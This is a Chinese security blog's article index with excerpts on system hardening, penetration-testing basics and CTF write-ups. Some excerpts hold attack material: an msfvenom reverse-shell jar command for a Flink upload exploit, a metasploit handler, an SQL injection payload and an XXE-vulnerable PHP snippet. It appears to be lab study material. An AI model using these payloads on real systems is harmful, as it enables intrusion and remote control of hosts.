自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(62)
  • 收藏
  • 关注

原创 windows加固-服务安全

禁用TCP/IP上的NetBIOSNETBIOS:在安装了TCP/IP协议的同时,NetBIOS也会被作为默认设置安装到系统中。NetBIOS 协议所使用的端[ ]是139端口,139 端[ ]的开放意味硬盘可能会在网络中共享;网上黑客也可通NetBIOS入侵用户计算机中。操作:禁用TCP/IP_上的NetBIOS协议,可以关闭监听的UDP 137 (netbios-ns)、UDP 138 (netbios-dgm) 以及TCP 139 (netbios-ssn) 端口。配置:1,在控制面板-&

2021-11-29 21:05:04 5701

原创 windows加固-文件权限

文件权限隐藏重要文件原因:为了保护电脑中的隐私或者重要文件,会把文件隐藏起来,防止他人查看,但是只要在计算机中设置显示隐藏文件,他人仍可以可以查看,修改注册表,即使用户设置了显示隐藏文件也无法看到被隐藏的文件。配置:单击开始菜单,打开运行,输入"regedit" ,依次展开: “HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL”,到"Checke

2021-11-29 19:50:45 570

原创 windows加固-网络安全配置

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录协议安全SYN攻击保护启用TCP/IP筛选(关闭139端口为例)关闭ICMP (禁ping)更改远程终端默认3389端口关闭445,5355端口系统防火墙开启防火墙入站连接设置为 “阻止(默认)“出站连接设置为"允许(默认)”协议安全SYN攻击保护原因:防止因为SYN Flood攻击导致的服务器当机。SYN Flood攻击之前的文章有说明了。配置:在”开始->运行->键入regedit" ,根据推荐值配置wi

2021-11-29 15:49:12 5049

原创 Windows加固-日志配置

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录审核策略:审核策略审核策略更改日志记录设置防火墙日志文件路径日志文件大小审核策略:审核登录事件:审核账户的登录或注销操作。审核对象访问:审核对文件或文件夹等对象的操作。审核过程跟踪:审核应用程序的启动和关闭。审核目录服务访问:审核对活动目录的各种访问。审核特权使用:审核用户执行用户权限的操作,如更改系统时间等。审核系统事件:审核与系统相关的事件,如重新启动或关闭计算机等。审核账户登录事件:审核账户的登录或注销另一台

2021-11-24 21:38:07 3197

原创 Windows安全加固-账户管理和认证授权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录管理账户重命名Administrator, 禁用GUEST不显示最后登录的用户名系统无效帐户清理按照用户类型分配账号管理口令配置密码策略配置账户锁定策略授权远程关机本地关机用户权限指派授权帐户登录授权帐户从网络访问禁止系统自动登录管理账户重命名Administrator, 禁用GUESTAdministrator账户是微软操作系统的默认系统管理员账户,且此账户无法被停用,也就意味着黑客可以直接暴力猜测密码,因为用户名是默认值

2021-11-24 17:20:02 3798

原创 Linux访问身份验证和授权

文章目录SSH服务配置补充设置是否使用基于主机的验证禁止解析SSH环境变量使用经过校验的MAC算法设置登录SSH提示信息配置PAM密码安全策略创建一定强度的密码SSH服务配置补充设置是否使用基于主机的验证描述:HostbasedAuthentication参数指定是否允许可信主机通过rhosts或/etc/hosts.equiv胪进行身份验证以及成功的公钥落户机主机身份验证。此选项只适用于SSHV2版本。配置:编辑/etc/ssh/sshd_ config文件来设置如下所示参数:Host

2021-11-23 17:06:15 4445

原创 Linux审计与日志安全加固

审计和日志服务配置审计数据配置日志文件最大参数在储存策略(/etc/audit/audit.conf)中配置max_log_file=<MB>当审计日志满的时候停止系统space_left_action=emailaction_mail_acct=rootadmin_space_left_action=halt当审计日志文件达到最大时,替换日志但不删除。max_log_file_action=keep_logs启动audit守护进程记录系统时间,查看是否有未经授权的访问信息

2021-11-08 20:04:03 4154

原创 Linux网络安全配置

文章目录网络参数设置禁用IP转发禁止数据包发送重定向不接收源路由信息包记录可疑数据包启用TCO SYN Cookies禁用ipv6网络访问控制TCP-Wrappers网络参数设置禁用IP转发不当路由器!!配置方法:在/etc/sysctl.conf或/etc/sysctl.d/*中设置以下参数:net.ipv4.ip_ forward = 0运行以下命令来设置活动内核参数:sysctl -w net.ipv4.ip. forward=0sysctl -w net.ipv4.route..

2021-11-07 15:42:35 2718

原创 服务安全加固

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录禁用非必须服务-特殊用途服务卸载非必要的服务客户端正确配置必要的服务禁用非必须服务-特殊用途服务关闭Avahi服务Avahi:用于多插DNS/DNS-SD服务发现的系统。例如当计算机插入网络时,它会自动查找要打印的打印机,要打印的文件,和与之通话的用户。配置方法:systemctl stop avahi-daemon.servicesystemctl disable avahi-daemon.service检测方式

2021-11-05 22:17:45 3005

原创 Linux-安全加固

系列文章目录文章目录系列文章目录前言安全加固——基础加固方法文件系统配置软件更新配置软件更新配置安全启动配置加固内核参数警告信息设置前言安全加固的目的:操作系统之上的各种应用,要想获得信息的完整性、机密性、可用性和可控性,必须依赖于操作系统通用CentOs Linux 7操作系统缺省配置通常不满足系统安全性的要求操作系统的薄弱环节有安装和运行了冗余的服务、弱密码及匿名访问、开放了不必要的对外通讯端口、易受攻击的TCP/IP参数配置等,都容易成为日常运行和管理过程中的弱点安全加固就是对系统进

2021-11-03 13:10:58 3146

原创 渗透学习总结-Windows基础

文章目录Windows账户和组账户**组**Windows的Log(日志)系统Windows账户和组这里比较常用就不细说了。简要的概括下。账户默认账户:Administrator-默认的超级管理员系统超级管理员账户,具有最高权限。在域中和计算机中具有不受限制的权限,可以管理本地或域中的任何计算机,如创建账户、创建组、实施安全策略等。不被锁定,不能删除,可以重命名Guest-默认来宾账户默认被禁用,不能删除,可重命名权限有限,不能修改系统设置和安装程序,只能读取计算机系统信息

2021-10-28 14:41:28 3311

原创 渗透学习总结-Linux基础

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录Linux文件系统和分区磁盘分区原理介绍使用lsblk指令(逻辑磁盘分区)磁盘查询指令磁盘挂载指令Linux文件和目录重要介绍文件和目录的权限:Linux用户类型和组Linux服务管理服务管理指令端口审计手段Vim编译器Linux防火墙Linux日志信息命令Linux文件系统和分区磁盘分区原理介绍分区是逻辑上的概念。Linux分区和Windows分区不同,Windows一个分区对应一个盘符,Linux一个分 区对应一个目

2021-10-26 18:56:48 364

原创 网络安全协议分析-wireshark流量监控(未完)

-R 根据上一次进度继续破解-S 使用SSL协议连接-s 指定端口-l 指定用户名-L 指定用户名字典(文件)-p 指定密码破解-P 指定密码字典(文件)-e 空密码探测和指定用户密码探测(ns)-C 用户名可以用:分割(username:password)可以代替-l username -p password-o 输出文件-t 指定多线程数量,默认为16个线程-vV 显示详细过程server 目标IPservice 指定服务名(telnet ftp pop3 mssql mysq

2021-10-23 15:49:11 2535

原创 ARP路由欺骗并利用

文章目录一、什么是ARP二、ARP欺骗原理三、ARP欺骗实现,嗅探利用使用arpspoof实施中间人攻击中间人攻击还原目标机访问的图片中间人攻击抓取目标机访问的URL地址中间人攻击抓取目标机提交的密码中间人攻击抓取目标机提交的HTTP明文密码四、ARP欺骗的防御方式一、什么是ARPARP协议概述: ARP协议是“Address Resolution Protocol”(地址解析协议)的缩写。 计算机通过ARP协议将IP地址转换成MAC地址。二、ARP欺骗原理1.每一个主机都会高速缓存存放最近IP

2021-10-21 09:01:44 1034

原创 Apache HTTP Server 2.4.49 路径穿越,远程命令执行漏洞

文章目录项目场景:问题描述:原因分析:解决方案:项目场景:Apache HTTP Server 2.4.49,2.5.0问题描述:攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。原因分析:远程命令执行在httpd.conf的文件中的这俩配置,导致任意请求都能访问根目录,和cgi-bin目录。CGI是一段程序,它运行在Server上,提供同客户端 Html页面的接口。如果它能目

2021-10-20 09:23:05 1747

原创 [MRCTF2020]Ezpop--序列化pop链

Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier { protected $var; public

2021-08-15 18:39:55 275

原创 BUUCTF--ReadlezPHP(反序列化简单应用)()

目录扫描之后发现没有文件泄露。查看一下源码发现了两个链接。源码:PHP魔术方法:magic这里eval没有用了不知道为啥(可能被过滤了吧)。这里用了assert截断函数(作用跟eval差不多,eval里面的语句要以;结尾)这里用蚁剑连接会连不上,就先查看一下phpinfo的信息。生成payload:<?php#error_reporting(0);class HelloPhp{ public $a; public $b; public function

2021-08-15 12:46:41 257

原创 搭建蜜罐系统--kippo,用rinetd把22端口重定向到2222(蜜罐中)

kippo概述蜜罐概述:蜜罐是一种软件应用系统,用来充当入侵诱饵,引诱黑客前来攻击。 攻击者入侵后,通过监测与分析,就可以知道他是如何入侵的,随时了解针对组织服务器发动的最新的攻击和漏洞。 还可以通过窃听黑客之间的联系,收集黑客所用的种种工具,并且掌握他们的社交网络。有两种基本类型的蜜罐技术:高交互性蜜罐—设置一个全功能的应用环境,引诱黑客攻击。低交互性蜜罐—模拟一个生产环境,所以只能提供有限的信息。举例:当有用户访问我们服务器的22端口的时候,把访问重定向到对应的2222端口(蜜罐)。出发警告

2021-08-04 23:19:42 1342

原创 Frp内网穿透服务器

前言:先举例说明内网是怎么与外网(百度进行数据交互的):内网192.168.111.78主机请求访问百度,发送数据包,目的ip(202.108.22.5:80)。源ip(192.168.111.78:80)当数据包经过NAT网关时,NAT网关会将源IP地址改为公网地址进行访问,相当于路由器代替我们访问了百度。就收百度返回的数据包时,那么要是不同的内网地址在同一个NAT/路由器下,应该怎么区分这个数据包是发给谁的,在NAT/路由器下有一个NAT表,不同的内网对应相同的NAT的不同端口,从而实现区分。内

2021-07-30 12:34:08 1135

原创 实战-PHP远程代码执行漏洞

环境搭建搭建go语言环境tar -C /usr/local -xzf go1.13.3.linux-amd64.tar.gz #解压go环境到常用命令的目录下└─# echo “export PATH=$PATH:/usr/local/go/bin” > /etc/profile.d/go.sh 配置go.sh└─# source /etc/profile.d/go.sh #运行go.sh└─# go下载使用漏洞的工具phuip-fpizdam:修改goproxy代理地址,默认地址国内无

2021-07-19 00:35:25 650 3

原创 Apache Flink任意jar包上传漏洞(1.9.1最新版)

环境:Cenos7,kali准备:安装Apache Flink包运行程序 cd flink-1.9.1/bin/ , ./start-cluster.sh生成反弹的shell,jar包。msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.238.128 LPORT=4444 -f jar > hack.jar开始打开localhost:8081并上传jar包开启监听msf6 > use exploit/multi/ha

2021-07-18 15:39:09 553

原创 暴力破解服务常见使用

pydictor(生成自己的字典并且更新自己的字典)-base表示密码所使用的字符-base Typed digital [0 - 9] # digital [ˈdɪdʒɪtl] 数字的L lowercase letters [a - z] # lowercase ['ləʊəˌkeɪs] 小写字母;letters [ˈletəz] 信,字母c capital letters [A - Z] # capital [ˈkæpɪtl] 大写的-o 指定字典存储的位置–len:生成密码长度由多少位到

2021-07-07 23:51:17 868 1

原创 PHP反序列化--简单ctf题--pop链(thinkphp5.1.X)漏洞复现

前言:PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法,这些都是PHP内置的方法。__construct 当一个对象创建时被调用__destruct 当一个对象销毁时被调用__wakeup() 使用unserialize时触发__sleep() 使用serialize时触发__call() 在对象上下文中调用不可访问的方法时触发__callStatic() 在静态上下文中调用不可访问的方法时触发__get() 用于从不可访问的属性读取数据__set() 用于将数据写入不可访

2021-07-07 11:59:25 4564

原创 XXE漏洞复现(有无回显)

环境:这里可以在metasploitable中进行试验,不可以在centos中进行试验,因为默认情况下centos中已经修复相关漏洞。libxml2.9.0之后默认不执行外部实体。用命令:rpm -qa | grep libxml可以去查看libxml的版本。复现:先去生成一个解析xml数据并打印传入的数据的一个php文件。<?php $xml=file_get_contents("php://input"); $data = simplexml_load_string($xml) ; e

2021-07-01 16:52:12 1785 5

原创 搭建并攻破discuz靶场(复现)并且盗取数据库

环境:Centos7,Win10搭建环境:一个新的Centos7虚拟机,需要搭建一个LAMP环境。命令:yum -y install httpd mariadb-server mariadb php php-mysql(下载环境)开启服务器和数据库命令:systemctl start httpd,systemctl start mariadb设置mysql数据库用户名密码:mysql -u root -p 123456注意:这里我之前设置过密码,但是我忘了,淦!解决办法:漏洞概述: 这漏洞

2021-06-30 22:21:26 2932 4

原创 [SWPU2019]Web1--SQL注入无列名注入

前言大佬wp:无列名注入解题:前面正常注册然后有个提交广告的。一开始还被这个id迷惑了,以为这里有注入口,后面反应过来这只是个创建页面的编码。进入正题:这里发现他过滤了许多函数。和–,#;空格也被过滤了,我这里用的/**/来绕过,除了这个(),/!* */也可以一时间不知道怎么爆出来表名。后面发现mysql会有默认的users表。所以这里主要用到了无列名注入。那么首先就是猜user库里面有几列了。命令:-1'/**/union/**/select/**/1,2,(select/**/1/

2021-06-11 16:28:10 265 2

原创 WUSTCTF2020]朴实无华-intval()漏洞,md5()漏洞,cat被过滤了用啥,shell命令中空格被过滤

前言:Dirsearch扫一下就有发现robots.txt文件。这题还是比较简单的。解题:<?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__file__);//level 1if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 && i

2021-06-10 12:37:21 872 2

原创 [0CTF 2016]piapiapia 1--序列化问题

前言:这里存在源文件泄露。用dirsearch扫一下就有了要记的加参数-e* -s 1这里不作赘述。发现有6个PHP文件的泄露。解题:发现在config.php文件里面有个fla参数。那基本方向就名确了。下面就是应该怎么打开这个文件呢。在profile.php文件中发现了,有个file_get_config函数,这个函数可以打开文件。那也就是说:$profile[‘photo’]=config.php就好了。$profile = unserialize($profile); $phone

2021-06-09 10:56:58 353 2

原创 [安洵杯 2019]easy_serialize_php--序列化绕过,extract()函数。

解题:打开源码: <?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img);}if($_SESSION){ unset($_SESS

2021-06-06 13:47:54 346 1

原创 [SUCTF 2019]EasySQL--SQL注入--将||视为字符串连接符而非或运算符

前言:看了大佬的wp才会,这里要猜得出数据库里面的匹配语句是啥才行。select $_POST[query] || flag from flag解题:输入1之后会回显:输入1’,什么都没显示.输入1"之后发现。"被过滤了。fuzz测试之后发现他过滤l很多,但是无论输入什么数字都只会出现第一幅图的界面。就可以猜测出来这里可能返回的是bool值。背后的逻辑:select $_POST[query] || flag from flag看了wp后发现:PIPES_AS_CONCAT能将||视为字符

2021-06-03 12:33:46 149

原创 [BSidesCF 2020]Had a bad day--利用php:filter伪协议嵌套

题目比较简单直接解题吧。从报错信息可以看出,里面有include函数。并且发现他拼接了一个.php后缀解码:<?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){ include ($fil

2021-06-02 16:37:04 435 3

原创 [ASIS 2019]Unicorn shop--unicode和utf-8

看的WP,自己没啥思路。这里想办法买了第四个马就行了。抓包输入之后报错:只能输入一个Unicode值。(输入thousand之后会显示大于等于1000的符号)这个符号会显示钱不够。换一个符号,把符号粘贴上去就行了。...

2021-05-31 20:56:49 95

原创 [De1CTF 2019]SSRF Me--python的代码审计

解题:整理一下python源码。#! /usr/bin/env python#encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)sec

2021-05-31 19:19:40 248

原创 [网鼎杯 2020 朱雀组]phpweb--程序执行函数漏洞

call_user_func用file_get_content函数获取index.php文件内容。<?phpdisablefun=array("exec","shellexec","system","passthru","procopen","showsource","phpinfo","popen","dl","eval","procterminate","touch","escapeshellcmd","escapeshellarg","assert","substrreplace","ca

2021-05-30 13:57:12 194

原创 安洵杯 2019]easy_web--md5强碰撞--命令注入绕过

知识点:MD5强碰撞%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87

2021-05-29 11:07:21 1149

原创 [BJDCTF2020]ZJCTF,不过如此--preg_mach绕过,file_get_contents绕过

前言:绕过file_get_contents绕过preg_mach解题:

2021-05-25 11:26:32 467

原创 [BJDCTF2020]The mystery of ip--ip伪造,SSTI

解题:打开后有如下界面。发现提示了IP地址,题目也是神秘的ip。那么就想到了伪造ip。X-Forwarded-For或者client-Ip。那么就进行伪造看看吧。发现进行修改后页面没有变化,但是给的ip变了。这就想到了可能存在SSTI漏洞。传入{{1*2}},发现真的存在漏洞。后面就正常操作了。{{system(‘cat /…/…/…/flag’)}};...

2021-05-24 11:25:37 143

原创 [GWCTF 2019]我有一个数据库--远程文件包含漏洞--phpmyadmin(4.80-4.81)

前言:Phpmyadmin(4.80-4.81)存在文件包含漏洞。漏洞博客漏洞代码:// If we have a valid target, let's load that script insteadif (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && ! preg_match('/^index/', $_REQUEST['target']) &

2021-05-23 17:25:40 117

原创 [GXYCTF2019]禁止套娃 1--无参数RCE

前言:无参数RCERCEhex2bin() 函数把十六进制值的字符串转换为 ASCII 字符。localeconv() 函数返回一包含本地数字及货币格式信息的数组。localeconv() 函数会返回以下数组元素:[decimal_point] - 小数点字符.........array_flip() 函数用于反转/交换数组中的键名和对应关联的键值。array_rand() 函数返回数组中的一个随机键名,或者如果指定函数返回键名不只一个,则返回一个包含随机键名的数组。get_define

2021-05-22 20:40:28 705

原创 BUUCTF_RoarCTF2019_EasyJava--基于java开发的web漏洞--任意文件下载

WEB-INF主要包含一下文件或目录:/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件/WEB-INF/src/:源码目录,按照包名结构放置各个

2021-05-21 16:45:01 450

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除